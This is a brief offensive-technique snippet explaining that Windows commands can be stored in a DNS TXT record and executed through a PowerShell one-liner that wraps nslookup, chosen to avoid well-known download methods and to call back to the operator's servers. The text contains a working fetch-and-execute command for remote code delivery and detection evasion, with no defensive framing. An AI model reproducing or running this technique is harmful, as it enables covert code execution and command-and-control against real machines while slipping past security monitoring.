Link
DNS text records can be utilized to host arbitrary Windows system commands. By adding a payload to a TXT record and calling it, it’s possible to execute without invoking expression or other well-identified methods of downloading files.
powershell (nslookup -q domainname.tld)[-1]
Once executed, it should call back to whatever servers are being used